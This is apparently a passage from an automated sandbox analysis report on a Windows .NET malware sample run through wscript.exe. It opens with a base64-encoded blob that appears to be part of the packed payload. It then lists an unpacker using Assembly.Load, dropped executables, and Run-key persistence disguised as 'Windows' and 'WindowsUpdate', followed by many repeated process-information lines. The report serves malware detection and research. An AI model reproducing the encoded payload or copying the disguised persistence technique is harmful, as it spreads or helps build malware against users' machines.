AAARfg8AAApy7QEAcBdvFgAACgoGckkCAHAoEwAACm8RAAAKKgAAEzAEAEkAAAAEAAARKBMAAAofGigXAAAKclkCAHAoGAAACigZAAAKfg8AAApy7QEAcBdvFgAACgoGcnMCAHAfGigXAAAKclkCAHAoGAAACm8RAAAKKgAAABswBACDAAAABgAAEQMoGgAACgRvGwAACnMcAAAKCnMdAAAKC3MeAAAKDAgGCG8fAAAKHltvIAAACm8hAAAKCAYIbyIAAAoeW28gAAAKbyMAAAoHCG8kAAAKF3MlAAAKDQkCFgKOaW8mAAAKCW8nAAAKB28oAAAKEwTeESYWKCkAAAoWjSIAAAETBN4AEQQqAAEQAAAAAAAAb28AEQEAAAEeAigqAAAKKnivAADOyu++AQAAAJEAAABsU3lzdGVtLlJlc291cmNlcy5SZXNvdXJjZVJlYWRlciwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5I1N5c3RlbS5SZXNvdXJjZXMuUnVudGltZVJlc291cmNlU2V0AgAAAAIAAAAAAAAAUEFEUEFEUCNvMppms7xBRQAAAAAAAABOAQAAQDMAMgA4ADkAOAA1ADIAMgA5ADIAOABjADQAZgBhAGQAOQAyAGQANQA1ADQANABlADMAOQBjADQAYgA2ADIAOAAAAAAAQDgANABjAGUAYwAxADkAMgAyADUANAAzADQAMAAwADYAOAA1ADcAOAAwADkAMAA3ADUAMwAyADMAMwBlADkAMwAVkgAAIBCSAABjC40i13I4prC0gUpwMXuco6vxjN+jvtHaMYum1g5uEic3OOy4tqB8ktlQYz3hPA4d1j9HBsnF/tc3WtzfRTOxurBApbc3y3s1fFYCoC4aqulgh1O8t7gu/KdYg49WIBjSUZPU8srcDkQa4Q3r5bKFTSsOiXPtV1wPRME0H1dxvJYoZMqQ3l0msN9xdKmae9mMsoDhHOXIxoe45Oth3LxHd3+SIEJAKWTGhSwqcjdya4mx8SxN7dcSR1mIMVZ12PRM53QTgBlSAmQ1hKHeQwXw4vPIPvuYxkteImAzd5CDqTpR4u

.NET source code contains potential unpacker

Source: fzP.exe.0.dr, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: 0.3.wscript.exe.1af3297ee40.0.raw.unpack, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: 0.2.wscript.exe.1af32851b90.0.raw.unpack, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: 0.3.wscript.exe.1af3297ee40.1.raw.unpack, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: Service.exe.2.dr, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])

Source: fzP.exe.0.dr	Static PE information: section name: .text entropy: 7.923107001917767
Source: Service.exe.2.dr	Static PE information: section name: .text entropy: 7.923107001917767

Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File created: C:\Users\user\AppData\Roaming\Service.exe			Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\fzP.exe			Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
